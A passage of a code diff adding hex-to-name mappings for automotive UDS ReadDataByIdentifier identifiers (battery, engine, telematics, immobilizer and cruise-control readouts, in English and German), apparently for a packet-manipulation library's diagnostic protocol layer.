+UDS_RDBI.dataIdentifiers[0x1b06] = "HV SOC Time Stats" +UDS_RDBI.dataIdentifiers[0x1b07] = "HV Voltage Time Stats" +UDS_RDBI.dataIdentifiers[0x1b08] = "HV Temperature Time Stats" +UDS_RDBI.dataIdentifiers[0x1b09] = "HV Battery Voltage Exceeded" +UDS_RDBI.dataIdentifiers[0x1b11] = "HV Module Volt Differentials Time Stats" +UDS_RDBI.dataIdentifiers[0x1b12] = "HV Module Temperature Differentials Time Stats" +UDS_RDBI.dataIdentifiers[0x1b14] = "HV SOC History 0" +UDS_RDBI.dataIdentifiers[0x1b15] = "HV Coolant Temperature Differentials Time Stats" +UDS_RDBI.dataIdentifiers[0x1b16] = "HV Current Time Stats" +UDS_RDBI.dataIdentifiers[0x1b17] = "Resistance Histogram" +UDS_RDBI.dataIdentifiers[0x1c20] = "Low Voltage Circuit Temperature" +UDS_RDBI.dataIdentifiers[0x1c23] = "APM Heat Plate Temperature" +UDS_RDBI.dataIdentifiers[0x1c24] = "HCP High Voltage Circuit Voltage" +UDS_RDBI.dataIdentifiers[0x1c25] = "APM High Voltage Circuit Current" +UDS_RDBI.dataIdentifiers[0x1c26] = "MCPA IGBT Module Temperature" +UDS_RDBI.dataIdentifiers[0x1c27] = "MCPB IGBT Module Temperature" +UDS_RDBI.dataIdentifiers[0x1c28] = "MCPA IGBT Module Temperature" +UDS_RDBI.dataIdentifiers[0x1c29] = "MCPB IGBT Module Temperature" +UDS_RDBI.dataIdentifiers[0x1c2a] = "MCPA IGBT Module Temperature" +UDS_RDBI.dataIdentifiers[0x1c2b] = "MCPB IGBT Module Temperature" +UDS_RDBI.dataIdentifiers[0x1c2c] = "Low Voltage Circuit" +UDS_RDBI.dataIdentifiers[0x1c2e] = "High Voltage" +UDS_RDBI.dataIdentifiers[0x1c2f] = "Maximum Hybrid Battery Module Voltage" +UDS_RDBI.dataIdentifiers[0x1c30] = "Minimum Hybrid Battery Module Voltage" +UDS_RDBI.dataIdentifiers[0x1c31] = "APM Power Loss" +UDS_RDBI.dataIdentifiers[0x1c32] = "Contactor Commanded PWM" +UDS_RDBI.dataIdentifiers[0x1c36] = "Low Voltage Circuit Current" +UDS_RDBI.dataIdentifiers[0x1c37] = "Low Voltage Circuit Voltage" +UDS_RDBI.dataIdentifiers[0x1c38] = "Voltage Output Set Point Duty Cycle Command" +UDS_RDBI.dataIdentifiers[0x1c39] = "Accessory Power Module Functional" +UDS_RDBI.dataIdentifiers[0x1c45] = "Motor A Mid-Pack Voltage" +UDS_RDBI.dataIdentifiers[0x1c46] = "Motor B Mid-Pack Voltage" +UDS_RDBI.dataIdentifiers[0x1ce0] = "Rate Limiter Configuration" +UDS_RDBI.dataIdentifiers[0x1f01] = "Mesurement ID Control" +UDS_RDBI.dataIdentifiers[0x1f02] = "Enable/Disable ALS" +UDS_RDBI.dataIdentifiers[0x1f04] = "Variant coding - actual status" +UDS_RDBI.dataIdentifiers[0x1f08] = "Variant coding - Compatible variants" +UDS_RDBI.dataIdentifiers[0x1fb1] = "KG Versorgungsspannung Ist Wert Versorgungsspannung" +UDS_RDBI.dataIdentifiers[0x1fc0] = "KG Geraeteparameter" +UDS_RDBI.dataIdentifiers[0x1fc1] = "Status Tuer" +UDS_RDBI.dataIdentifiers[0x1fc2] = "KG Diagnosespannung HF Ausgang Spannung Diagnoseeingang HF" +UDS_RDBI.dataIdentifiers[0x1fd0] = "Eingangssignale Read" +UDS_RDBI.dataIdentifiers[0x1fd1] = "Tuergrifftelegramme" +UDS_RDBI.dataIdentifiers[0x1fd2] = "KG aktuelle LF Parameter lesen Ortungsfeld hinten" # or KG FZV Zaehler Zaehler, FZV Zaehler Read Response Parameters Zaehler +UDS_RDBI.dataIdentifiers[0x1fd3] = "Batteriespannung Schluessel Read Batteriespannung Schluessel" +UDS_RDBI.dataIdentifiers[0x2000] = "Motordrehzahl Eng Spd" +UDS_RDBI.dataIdentifiers[0x2001] = "Read Stored Switch States" +UDS_RDBI.dataIdentifiers[0x2002] = "Read Actual Switch States" # or Kraftstoffmenge rechts, Registration Status Registration Error +UDS_RDBI.dataIdentifiers[0x2003] = "Vehicle speed" # or Vehicle speed Read Vehicle speed, Kraftstoffmenge links +UDS_RDBI.dataIdentifiers[0x2004] = "Certificate Status Certificate" # or Compatibility, Estimated effective engine torque +UDS_RDBI.dataIdentifiers[0x2005] = "voltage Read Battery voltage" # or Geber Nockenwelle Signal Einlass, Signal Strength BT WiFi BT Signal Strength +UDS_RDBI.dataIdentifiers[0x2006] = "Klopfsensor" # or Klemme87 Rueckmeldeleitung, BT Address BT Adress, Klopfsensor - Klopfen erkannt +UDS_RDBI.dataIdentifiers[0x2007] = "Oil temperature engine Read Oil temperature engine" # or Oil temperature engine, Massentrom aus HFM +UDS_RDBI.dataIdentifiers[0x2008] = "temperature" # or temperature Read Fuel temperature, Spannung O2-Regelsonde Bank 2 Rohwert, TCU Inputs Battery Voltage +UDS_RDBI.dataIdentifiers[0x2009] = "TCU Output ECall LED" # or Atmospheric pressure, Spannung O2-Regelsonde Bank 1 Rohwert +UDS_RDBI.dataIdentifiers[0x200b] = "Accelerator pedal voltage track" +UDS_RDBI.dataIdentifiers[0x200c] = "Cellular Network Signal Information Cell ID" +UDS_RDBI.dataIdentifiers[0x200d] = "TCU Environmental Information Ignition State" # or Pedalwertgeber Versorgungsspannung gesamt, Freon pressure sensor voltage +UDS_RDBI.dataIdentifiers[0x200e] = "WiFi MAC Address Address" # or Key state Read Key state, Pedalwertgeber 1 Sent Counts, Key state +UDS_RDBI.dataIdentifiers[0x200f] = "Pedalwertgeber 2 Sent Counts" # or HU Connectivity Status BT Connection, Brake pedal switches consolidation state +UDS_RDBI.dataIdentifiers[0x2010] = "Engine status Read Engine status" # or Spannung O2-Diagnosesonde Bank 2 Rohwert, SIM Profile Active Profile, Engine status +UDS_RDBI.dataIdentifiers[0x2011] = "BT Address HU" # or Kuehlmitteltemperatur korrigiert, BT Address HU BT Adress +UDS_RDBI.dataIdentifiers[0x2012] = "Pedalwertgeber Versorgungsspannung" # or Spannung O2-Diagnosesonde Bank 1 Rohwert, Sonde Rechts Nach KAT ROH, Atmospheric pressure sensor voltage +UDS_RDBI.dataIdentifiers[0x2013] = "Pedalwertgeber" +UDS_RDBI.dataIdentifiers[0x2014] = "Gangsensor SG Horizontal ROH" # or Camshaft crankshaft synchronization state, Ansauglufttemperatur in HFM bzw. vor DK, Ansauglufttemperatur +UDS_RDBI.dataIdentifiers[0x2015] = "Gangsensor SG Horizontal" +UDS_RDBI.dataIdentifiers[0x2016] = "Gangsensor SG Vertikal" # or Crankshaft synchronization state, Cellular Antenna Switch Status, Cellular Antenna Switch Status Antenna Active +UDS_RDBI.dataIdentifiers[0x2017] = "PremAirkuehlertemperatur" # or Gangsensor SG Fahrstufe +UDS_RDBI.dataIdentifiers[0x2018] = "Cellular Network Numbers MSISDN MDN PRES MSISDN type ASCII 15 byte" # or Cellular Network Numbers EUICC PRES EUICC type ASCII32Byte, Cellular Network Numbers IMSI MIN PRES IMSI type ASCII 15byte, Cellular Network Numbers EUICC, Cellular Network Numbers ICCID PRES ICCID type ASCII22Byte, Cellular Network Numbers IMEI MEID PRES IMEI type ASCII 16Byte +UDS_RDBI.dataIdentifiers[0x2019] = "Tankdruckdifferenz" # or Kupplungspedalsensor +UDS_RDBI.dataIdentifiers[0x201a] = "Kupplungspedalsensor Weg" # or Batteriespannung BATZ, Operating Mode, Operating Mode Operating +UDS_RDBI.dataIdentifiers[0x201b] = "Panic Alarm Configuration PAN MIN INTERMESSAGE TIME" +UDS_RDBI.dataIdentifiers[0x201c] = "Monitool Supervisor status" # or Power Mode Timers DNO Intended Reset, Power Mode Timers, Ansauglufttemperatur im Saugrohr +UDS_RDBI.dataIdentifiers[0x201d] = "Thermoplungers command state" # or Ansauglufttemperatur im Saugrohr Roh, GNSS Position Data DR DateYear +UDS_RDBI.dataIdentifiers[0x201e] = "Air conditioning state" # or Remote Update Setting maxSWDLLmaxIgnitionOffDuration, Tankdruckdifferenz bei DMTL, Remote Update Setting +UDS_RDBI.dataIdentifiers[0x201f] = "Ansauglufttemperatur korrigiert" # or Speed Alert, Speed Alert Notification Interval +UDS_RDBI.dataIdentifiers[0x2020] = "VTA Mature Time atnAlarmThreshold" # or VTA Mature Time, 2021 2040 +UDS_RDBI.dataIdentifiers[0x2021] = "Ansauglufttemperatur in HFM bzw. vor DK Rohwert" +UDS_RDBI.dataIdentifiers[0x2022] = "Batteriespannung ROH ADC Value" # or Read Time of Last Reconcilliation Date of Last Reconciliation day +UDS_RDBI.dataIdentifiers[0x2023] = "Kuehlmitteltemperatur ROH" # or Service Provider Reconciliation, Service Provider Reconciliation Date of Last Reconciliation day +UDS_RDBI.dataIdentifiers[0x2024] = "Idle engine speed setpoint" # or Service Provisioning Authorization State Adapt Authorization, Chiller Temperatur ROH, Service Provisioning Authorization State +UDS_RDBI.dataIdentifiers[0x2025] = "GNSS Time Epoch" # or Brake pedal close active switch state, GNSS Time Epoch Value, Chiller Temperatur, Pedalwertgeber Potentiometer 1 Rohwert +UDS_RDBI.dataIdentifiers[0x2026] = "Brake pedal open active switch state" # or Kuehlmitteltemperatur NT2 Batterie Plugin Hybrid ROH, Cellular Network Current Provider Name Name, Pedalwertgeber Potentiometer 2 Rohwert +UDS_RDBI.dataIdentifiers[0x2027] = "Clutch pedal minimum travel switch state CAN" # or Kuehlmitteltemperatur NT2 Batterie Plugin Hybrid, Saugrohrdruck Rohwert, Saugrohrdruck ROH, Cellular Network Home Provider Name Name +UDS_RDBI.dataIdentifiers[0x2028] = "Tankdruckdifferenz Rohwert" # or Tankdruckdifferenz ROH, Kuehlertemperatur PremAir, MIL lamp request state, LU Part Number Part Number +UDS_RDBI.dataIdentifiers[0x2029] = "Chiller Druck ROH" # or Cellular Network Visible Neighbor Cell Stations Mobile Country Code Nr, Pedalwertgeberstellung +UDS_RDBI.dataIdentifiers[0x202a] = "Chiller Druck" # or Regenerierleitung Druck ROH +UDS_RDBI.dataIdentifiers[0x202b] = "Kuehlertemperatur PremAir SignalQualifier" # or Regenerierleitung Druck +UDS_RDBI.dataIdentifiers[0x202c] = "Chiller Druck ungefiltert" +UDS_RDBI.dataIdentifiers[0x202d] = "Protected state" +UDS_RDBI.dataIdentifiers[0x202e] = "Accelerator pedal position" +UDS_RDBI.dataIdentifiers[0x2030] = "Intake camshaft phaser position setpoint" # or Kuehlmittellevel Niedertemperatur Kreislauf ROH, TCU Internal SW Versions Application NAD +UDS_RDBI.dataIdentifiers[0x2031] = "Kraftstofftemperatur im Tank Rohwert" # or Intake camshaft phaser position +UDS_RDBI.dataIdentifiers[0x2032] = "Secure Mode Debug Interface" # or Intake camshaft phaser position bank, Kraftstofftemperatur im Tank, Tanktemperatur +UDS_RDBI.dataIdentifiers[0x2033] = "Main Processor NVM Fault" # or Intake camshaft phaser PWM command, Secure Mode Get ID Identification Data +UDS_RDBI.dataIdentifiers[0x2034] = "Main Processor RAM Fault Source Address" # or Intake camshaft phaser PWM command bank, Set Secure Mode +UDS_RDBI.dataIdentifiers[0x2035] = "Force Network Generation" # or Force Network Generation Used Network, CCSL Cruise control speed setpoint, Processor ROM Fault Source Address +UDS_RDBI.dataIdentifiers[0x2036] = "Sonde Innenwiderstand Rechts Vor Kat" # or Counter of inconsistencies between accelerator pedal and brake, Innenwiderstand Lambdasonde Bank 1 vor Kat +UDS_RDBI.dataIdentifiers[0x2037] = "Steuergeraete Innentemperatur Rohwert" # or Engine torque without gearbox request +UDS_RDBI.dataIdentifiers[0x2038] = "Steuergeraete Innentemperatur" +UDS_RDBI.dataIdentifiers[0x2039] = "Umgebungsdruck Rohwert" # or CCSL Steering wheel push buttons voltage +UDS_RDBI.dataIdentifiers[0x203a] = "Configuration Cruise control option" +UDS_RDBI.dataIdentifiers[0x203b] = "Configuration Cruise control On Off button" +UDS_RDBI.dataIdentifiers[0x203c] = "Cruise control On Off button state" +UDS_RDBI.dataIdentifiers[0x203d] = "Configuration Speed limiter option" +UDS_RDBI.dataIdentifiers[0x203e] = "Configuration Speed limiter On Off button" +UDS_RDBI.dataIdentifiers[0x203f] = "Speed limiter On Off button state" +UDS_RDBI.dataIdentifiers[0x2040] = "2041 2060" +UDS_RDBI.dataIdentifiers[0x2041] = "Pedalwertgeber 50% der Versorgungsspannung" # or Pedalwertgeber halbe Versorgungsspannung, Spannungsversorgung Sensorik, Configuration CCSL steering wheel push buttons +UDS_RDBI.dataIdentifiers[0x2042] = "Configuration Air conditioning control unit" # or Abgasklappe Temperatur +UDS_RDBI.dataIdentifiers[0x2043] = "Ladelufttemperatur" # or Configuration Freon pressure sensor +UDS_RDBI.dataIdentifiers[0x2044] = "Ladeluft Solltemperatur" # or Periodendauer Korrektursignal HFM, Powertrain setpoint +UDS_RDBI.dataIdentifiers[0x2045] = "Offset-Spannung Drucksensor Saugrohr" # or Kuelkreislauf HV Temperatur NT2, Clutch pedal maximum travel switch state +UDS_RDBI.dataIdentifiers[0x2046] = "Sonde Vor Kat Lambda" # or Kuehlkreislauf2 Niedertemperatur BMS ROH +UDS_RDBI.dataIdentifiers[0x2047] = "Chiller Temperatur Gradient" +UDS_RDBI.dataIdentifiers[0x2048] = "Cranking autorisation status" # or Temperatur Median Kaltstart +UDS_RDBI.dataIdentifiers[0x2049] = "ADC-Spannung Lambdasonde hinter Kat rechte" # or Sonde ADC Spannung Rechts Nach Kat +UDS_RDBI.dataIdentifiers[0x204a] = "Motor fans requests" # or Main Processor Total Running Resets +UDS_RDBI.dataIdentifiers[0x204b] = "CCSL Steering wheel push buttons state" # or Main Processor Maximum Running Resets Between Power-up Resets +UDS_RDBI.dataIdentifiers[0x204c] = "Sonde Nach Kat Innenwiderstand" # or CCSL +UDS_RDBI.dataIdentifiers[0x204d] = "CCSL State of the failures which cause irreversible CC safety failure" +UDS_RDBI.dataIdentifiers[0x204e] = "CCSL State of the reversible failures not due to CCSL which cause CCSL failure" # or Sonde Vor Kat Heizungsspannung +UDS_RDBI.dataIdentifiers[0x204f] = "CCSL State of the reversible failures not due to CC which cause CC failure" +UDS_RDBI.dataIdentifiers[0x2050] = "Displayed vehicle speed received on the CAN network" +UDS_RDBI.dataIdentifiers[0x2051] = "Displayed vehicle speed unit" +UDS_RDBI.dataIdentifiers[0x2053] = "ADC-Spannung Ansauglufttemperatur" +UDS_RDBI.dataIdentifiers[0x2057] = "Alternator power Read Alternator power" +UDS_RDBI.dataIdentifiers[0x2059] = "Clutch pedal minimum travel switch state wire" +UDS_RDBI.dataIdentifiers[0x205a] = "Idle engine speed regulation status" +UDS_RDBI.dataIdentifiers[0x205b] = "Limp home activation state" +UDS_RDBI.dataIdentifiers[0x205c] = "OBD readiness codes status" +UDS_RDBI.dataIdentifiers[0x205d] = "No driver request state pedal CCSL" +UDS_RDBI.dataIdentifiers[0x205f] = "Requested idle speed setpoint for LCV s accessories" +UDS_RDBI.dataIdentifiers[0x2060] = "2061 2080" +UDS_RDBI.dataIdentifiers[0x2061] = "Effective engine torque target requested by real pedal and virtual ACC CC SL drivers" # or Temperatursensor Niedertemperatur Kreislauf Rohwert +UDS_RDBI.dataIdentifiers[0x2062] = "ADC-Spannung Lambdasonde hinter Kat linke" # or Effective engine torque setpoint requested by real pedal and virtual ACC CC SL drivers +UDS_RDBI.dataIdentifiers[0x2063] = "Minimum engine torque" # or Temperatursensor Niedertemperatur Kreislauf +UDS_RDBI.dataIdentifiers[0x2064] = "Maximum engine torque" +UDS_RDBI.dataIdentifiers[0x2065] = "Maximum engine torque with dynamic limitations" +UDS_RDBI.dataIdentifiers[0x2066] = "Engine torque losses" +UDS_RDBI.dataIdentifiers[0x2067] = "Final indicated torque raw" +UDS_RDBI.dataIdentifiers[0x2068] = "Final indicated torque target" +UDS_RDBI.dataIdentifiers[0x2069] = "Final indicated torque setpoint" +UDS_RDBI.dataIdentifiers[0x206a] = "Brake pedal duration of the close active switch blocked" +UDS_RDBI.dataIdentifiers[0x206b] = "Brake pedal duration of the open active switch blocked" +UDS_RDBI.dataIdentifiers[0x206d] = "Configuration Clutch pedal minimum travel switch" +UDS_RDBI.dataIdentifiers[0x206e] = "Configuration Brake pedal open active switch" +UDS_RDBI.dataIdentifiers[0x206f] = "Synthesis of engine stop requests" +UDS_RDBI.dataIdentifiers[0x2070] = "Immobilizer diagnosis availability" +UDS_RDBI.dataIdentifiers[0x2071] = "Immobilizer Byte 1 used to allow diagnosis" +UDS_RDBI.dataIdentifiers[0x2072] = "Immobilizer Byte 2 used to allow diagnosis" +UDS_RDBI.dataIdentifiers[0x2073] = "Immobilizer Byte 3 used to allow diagnosis" # or Kraftstofftemperatur Niederdruck +UDS_RDBI.dataIdentifiers[0x2074] = "Immobilizer engine not running due to ECM" +UDS_RDBI.dataIdentifiers[0x2075] = "Immobilizer engine not running due to BCM in secure mode" +UDS_RDBI.dataIdentifiers[0x2076] = "Ladedruck ROH" # or Immobilizer engine not running due to no BCM authorization +UDS_RDBI.dataIdentifiers[0x2077] = "Ladedruck" # or Immobilizer engine not running due to a CAN network problem with the BCM +UDS_RDBI.dataIdentifiers[0x2078] = "CCSL State of the causes for normal CCSL deactivation" +UDS_RDBI.dataIdentifiers[0x2079] = "CCSL State of the system causes for normal CCSL deactivation" +UDS_RDBI.dataIdentifiers[0x207a] = "Ladedruck korrigiert" # or Maximum duration of resume button pressed +UDS_RDBI.dataIdentifiers[0x207b] = "Maximum duration of set button pressed" +UDS_RDBI.dataIdentifiers[0x207c] = "Maximum duration of set button pressed" +UDS_RDBI.dataIdentifiers[0x207d] = "Maximum duration of suspend button pressed" +UDS_RDBI.dataIdentifiers[0x207e] = "Maximum value of blocked button detection counter" +UDS_RDBI.dataIdentifiers[0x207f] = "Starter fault" +UDS_RDBI.dataIdentifiers[0x2080] = "2081 20A0" +UDS_RDBI.dataIdentifiers[0x2081] = "Configuration AGB automatic gearbox" +UDS_RDBI.dataIdentifiers[0x2082] = "Sondenheizung Nach Kat angesteuert" +UDS_RDBI.dataIdentifiers[0x2083] = "Configuration SDL speed and distance limiter" +UDS_RDBI.dataIdentifiers[0x2084] = "Configuration USM underhood switching module" # or Sonde Nach KAT Lambda +UDS_RDBI.dataIdentifiers[0x2085] = "Configuration BCM body control module" +UDS_RDBI.dataIdentifiers[0x2086] = "Configuration GCU gas control unit" # or Sonde Nach Kat Bereitschaft +UDS_RDBI.dataIdentifiers[0x2087] = "Configuration Cluster control unit" +UDS_RDBI.dataIdentifiers[0x2088] = "Configuration ABS ESP" +UDS_RDBI.dataIdentifiers[0x2089] = "Configuration SWA steering wheel angle" +UDS_RDBI.dataIdentifiers[0x208a] = "Configuration DDCM driver door control module" +UDS_RDBI.dataIdentifiers[0x208c] = "Maximum duration of ASCD button press" +UDS_RDBI.dataIdentifiers[0x208d] = "Detection of option presence enabled" +UDS_RDBI.dataIdentifiers[0x208e] = "gear engaged 01" +UDS_RDBI.dataIdentifiers[0x208f] = "Anticipated gear engaged" +UDS_RDBI.dataIdentifiers[0x2090] = "Sonde Nach Kat Taupunkt Erreicht" # or Coherent airbag crash frame detection +UDS_RDBI.dataIdentifiers[0x2091] = "Coherent airbag crash frame memorization" +UDS_RDBI.dataIdentifiers[0x2092] = "Air conditioning request" +UDS_RDBI.dataIdentifiers[0x2093] = "Test under pressure of the climatisation circuit" +UDS_RDBI.dataIdentifiers[0x2094] = "Combination of all vehicle air conditioning compressor inhibitions" +UDS_RDBI.dataIdentifiers[0x2095] = "Combination of all engine air conditioning compressor inhibitions" +UDS_RDBI.dataIdentifiers[0x2096] = "Automatic gearbox cranking authorization" +UDS_RDBI.dataIdentifiers[0x2097] = "Automatic gearbox cranking authorization via ECM" +UDS_RDBI.dataIdentifiers[0x2098] = "Accelerated idle speed requested by air conditioning" +UDS_RDBI.dataIdentifiers[0x2099] = "Alternator load" +UDS_RDBI.dataIdentifiers[0x209a] = "Adaptative correction of the idle engine speed regulator" +UDS_RDBI.dataIdentifiers[0x209b] = "Configuration Accessories idle engine speed strategy" +UDS_RDBI.dataIdentifiers[0x209d] = "Electric balance counter" +UDS_RDBI.dataIdentifiers[0x20a0] = "20A1 20C0" +UDS_RDBI.dataIdentifiers[0x20a3] = "Brake pedal states received on the CAN" +UDS_RDBI.dataIdentifiers[0x20a4] = "Sensors power supply 4 voltage raw acquisition" +UDS_RDBI.dataIdentifiers[0x20a5] = "Travelled distance in road and highway from the last oil drain" +UDS_RDBI.dataIdentifiers[0x20a6] = "Travelled distance in depollution zone from the last oil drain" +UDS_RDBI.dataIdentifiers[0x20a8] = "Oil soot rate max model" +UDS_RDBI.dataIdentifiers[0x20a9] = "Total time in richness 1 mode" +UDS_RDBI.dataIdentifiers[0x20aa] = "Mastervac vacuum pressure by sensor" +UDS_RDBI.dataIdentifiers[0x20ab] = "Brake vacuum status received on the CAN" +UDS_RDBI.dataIdentifiers[0x20ac] = "Mastervac vacuum pressure by sensor validity status" +UDS_RDBI.dataIdentifiers[0x20ad] = "Activation request of mastervac diagnosis sequence vacuum pump and analog sensor" +UDS_RDBI.dataIdentifiers[0x20b3] = "StopAuto forbidden by HV network" +UDS_RDBI.dataIdentifiers[0x20b4] = "DCDC activation required by Electrical Energy Management" +UDS_RDBI.dataIdentifiers[0x20b5] = "DCDC Input Current taken on high voltage network send by CAN" +UDS_RDBI.dataIdentifiers[0x20b6] = "DCDC Voltage on High Voltage Network send by CAN" +UDS_RDBI.dataIdentifiers[0x20b7] = "Low voltage power supply current supply by DCDC send by CAN" +UDS_RDBI.dataIdentifiers[0x20b8] = "Maximum current available by system on low voltage power supply send by CAN" +UDS_RDBI.dataIdentifiers[0x20b9] = "DCDC Fault type from CAN" +UDS_RDBI.dataIdentifiers[0x20ba] = "DCDC state send by CAN network" +UDS_RDBI.dataIdentifiers[0x20bc] = "Stop auto forbidden" +UDS_RDBI.dataIdentifiers[0x20bd] = "Electrical Energy Management Stop and Start type" +UDS_RDBI.dataIdentifiers[0x20c0] = "20C1 20E0" +UDS_RDBI.dataIdentifiers[0x20c3] = "Request of update concerning Vxx eng last cge km Vehicle distance at last engine change following a change of engine " +UDS_RDBI.dataIdentifiers[0x20c4] = "Raw boost pressure from sensor" +UDS_RDBI.dataIdentifiers[0x20c6] = "Raw acquisition of the boost pressure" +UDS_RDBI.dataIdentifiers[0x20c8] = "Gas pressure Manifold level" +UDS_RDBI.dataIdentifiers[0x20c9] = "Injected LPG mass setpoint disrigarding sylinder wall wetting to be added" +UDS_RDBI.dataIdentifiers[0x20ca] = "Bench mode to apply default on upstream O2 sensor richness signal for OBD needs" +UDS_RDBI.dataIdentifiers[0x20cb] = "Variable memorized in EEPROM to configure the THP scheduler activation" +UDS_RDBI.dataIdentifiers[0x20cc] = "4 of the 5 zones engine learned 01" +UDS_RDBI.dataIdentifiers[0x20cd] = "Boolean indicating than offset correction is currently on learning" +UDS_RDBI.dataIdentifiers[0x20ce] = "Mean adaptation factor on injection time for binary sensor" +UDS_RDBI.dataIdentifiers[0x20cf] = "Mean adaptation offset on injection time for binary sensor" +UDS_RDBI.dataIdentifiers[0x20d0] = "Raw adaptation factor on injection time with proportionnal upstream O2 sensor" +UDS_RDBI.dataIdentifiers[0x20d1] = "Adaptation raw offset on injection time with proportionnal upstream O2 sensor Bosch calculation value" +UDS_RDBI.dataIdentifiers[0x20d3] = "Factor to correct UEGO signal aging shifting" +UDS_RDBI.dataIdentifiers[0x20d4] = "Indicator of UEGO sensor signal first gain correction achieved when sensor is changed" +UDS_RDBI.dataIdentifiers[0x20d5] = "Downstream lambda sensor bench mode required for homologation" +UDS_RDBI.dataIdentifiers[0x20dc] = "Air flap configuration boolean" +UDS_RDBI.dataIdentifiers[0x20dd] = "Variable for presence of oil heater vapours conf choice" +UDS_RDBI.dataIdentifiers[0x20de] = "Ambient temperature" +UDS_RDBI.dataIdentifiers[0x20e0] = "20E1 2100" +UDS_RDBI.dataIdentifiers[0x20e1] = "Next gear position by shift pattern" +UDS_RDBI.dataIdentifiers[0x20e8] = "Maintenance mode status Roller bench mode information" +UDS_RDBI.dataIdentifiers[0x20f1] = "Position setpoint of the inlet throttle sent by the monitoring system" +UDS_RDBI.dataIdentifiers[0x20f4] = "Distance vehicle non resetable calculated by the ECM in decameter" +UDS_RDBI.dataIdentifiers[0x20f5] = "Ice powertrain setpoint elaborated from RAW" +UDS_RDBI.dataIdentifiers[0x20f8] = "Final position setpoint for multiways valve value" +UDS_RDBI.dataIdentifiers[0x20f9] = "Multiways valve position sensor" +UDS_RDBI.dataIdentifiers[0x20fa] = "Supervisor for thermo management" +UDS_RDBI.dataIdentifiers[0x20fb] = "Heater valve flow command value" +UDS_RDBI.dataIdentifiers[0x20ff] = "Relay electrical failure feedback" +UDS_RDBI.dataIdentifiers[0x2100] = "2101 2020" +UDS_RDBI.dataIdentifiers[0x2101] = "Kraftstoffdruck Sensorspannung" # or 4 last stored values of the oil drain type +UDS_RDBI.dataIdentifiers[0x2102] = "Hebelgeber 1 Signalspannung" +UDS_RDBI.dataIdentifiers[0x2103] = "Hebelgeber 2 Signalspannung" +UDS_RDBI.dataIdentifiers[0x2104] = "Kraftstoffqualitaetssensor Signalfrequenz" +UDS_RDBI.dataIdentifiers[0x2105] = "Kraftstoffqualitaetssensor DutyCycle" +UDS_RDBI.dataIdentifiers[0x2106] = "NVLD Switch Spannung Low" # or Actual geographic zone +UDS_RDBI.dataIdentifiers[0x2107] = "NVLD Switch Spannung High" +UDS_RDBI.dataIdentifiers[0x2108] = "Total vehicle distance stored at the last pre alert" +UDS_RDBI.dataIdentifiers[0x2109] = "First number of vehicle kilometers for the remaining potential calculation" +UDS_RDBI.dataIdentifiers[0x210a] = "vehicle kilometers for the remaining potential calculation" +UDS_RDBI.dataIdentifiers[0x210b] = "First oil wear for the remaining potential calculation" +UDS_RDBI.dataIdentifiers[0x210c] = "oil wear for the remaining potential calculation" +UDS_RDBI.dataIdentifiers[0x210d] = "Number of remaining vehicle kilometers at the last key off" +UDS_RDBI.dataIdentifiers[0x210e] = "Number of engine revolutions since the last oil drain" +UDS_RDBI.dataIdentifiers[0x210f] = "Internal number of the last oil drain" +UDS_RDBI.dataIdentifiers[0x2110] = "Total vehicle distance at the last oil drain" +UDS_RDBI.dataIdentifiers[0x2111] = "Last oil drain type" +UDS_RDBI.dataIdentifiers[0x2112] = "Boolean to initialise strategies in case of after sales oil drain" +UDS_RDBI.dataIdentifiers[0x2113] = "Oil temperature for oil wear estimation on previous engine off" +UDS_RDBI.dataIdentifiers[0x2114] = "Boolean set if the first oil dilution threshold is passed" # or Kupplungspedalsensor ROH +UDS_RDBI.dataIdentifiers[0x2115] = "Boolean set if the second oil dilution threshold is passed" # or Kupplungspedalsensor +UDS_RDBI.dataIdentifiers[0x211a] = "Interpolation raw factor" +UDS_RDBI.dataIdentifiers[0x211b] = "oil dilution rate for oil wear estimation" +UDS_RDBI.dataIdentifiers[0x211c] = "Rounded oil dilution potential meters" +UDS_RDBI.dataIdentifiers[0x211d] = "Vehicle kilometers memorisation trigger before rising edge" +UDS_RDBI.dataIdentifiers[0x211e] = "Oil drain requested by the strategy" +UDS_RDBI.dataIdentifiers[0x211f] = "Oil soot rate" +UDS_RDBI.dataIdentifiers[0x2120] = "2121 2140" +UDS_RDBI.dataIdentifiers[0x2121] = "Ansauglufttemperatur im Saugrohr im Kaltstart" +UDS_RDBI.dataIdentifiers[0x2122] = "Ansauglufttemperatur im Kaltstart" +UDS_RDBI.dataIdentifiers[0x2127] = "Sekundaerluft Druck ROH" +UDS_RDBI.dataIdentifiers[0x2128] = "Sekundaerluft Druck" +UDS_RDBI.dataIdentifiers[0x2129] = "Klimaanlagen Druck ROH" +UDS_RDBI.dataIdentifiers[0x212a] = "Klimaanlagen Druck" +UDS_RDBI.dataIdentifiers[0x2130] = "Sonde Vor Kat Waermemenge IST fuer TPE" +UDS_RDBI.dataIdentifiers[0x2132] = "Sonde Vor Kat Waermemenge SOLL fuer TPE" +UDS_RDBI.dataIdentifiers[0x2134] = "Sonde Nach Kat Waermemenge IST fuer TPE" +UDS_RDBI.dataIdentifiers[0x2136] = "Sonde Nach Kat Waermemenge SOLL fuer TPE" +UDS_RDBI.dataIdentifiers[0x2140] = "2141 2160" +UDS_RDBI.dataIdentifiers[0x2141] = "TRZ Value of the coeficient beta corrected by adaptative strategy during half turn of cyl 1 and 4 for torque computat" +UDS_RDBI.dataIdentifiers[0x2142] = "TRZ the learning trz beta correction is validated" +UDS_RDBI.dataIdentifiers[0x2143] = "TRZ Value of the coeficient beta corrected by adaptative strategy during half turn of cyl 2 and 3 for torque computat" +UDS_RDBI.dataIdentifiers[0x2144] = "TRZ Learning crankshaft defaults half turn counter" +UDS_RDBI.dataIdentifiers[0x2145] = "TRZ TRZ adaptive correction for torque calculation when cyl 1 and 4 are in combustion filtered beta value for cylind" +UDS_RDBI.dataIdentifiers[0x2146] = "TRZ TRZ adaptive correction for torque calculation when cyl 2 and 3 are in combustion filtered beta value for cylind" +UDS_RDBI.dataIdentifiers[0x2147] = "TLZ Status of target adaptive process" +UDS_RDBI.dataIdentifiers[0x2157] = "TLZ Maximum engine speed for misfiring detection strategy" +UDS_RDBI.dataIdentifiers[0x215a] = "TLZ Learning counter for realized half turn default" +UDS_RDBI.dataIdentifiers[0x215b] = "TLZ Learning half turn default state" +UDS_RDBI.dataIdentifiers[0x215c] = "TLZ learning filtered value" +UDS_RDBI.dataIdentifiers[0x215d] = "TLZ TLZ adaptive correction" +UDS_RDBI.dataIdentifiers[0x215e] = "Distance driven since torque meter init" +UDS_RDBI.dataIdentifiers[0x215f] = "Consolidated intake camshaft level" +UDS_RDBI.dataIdentifiers[0x2160] = "2161 2180" 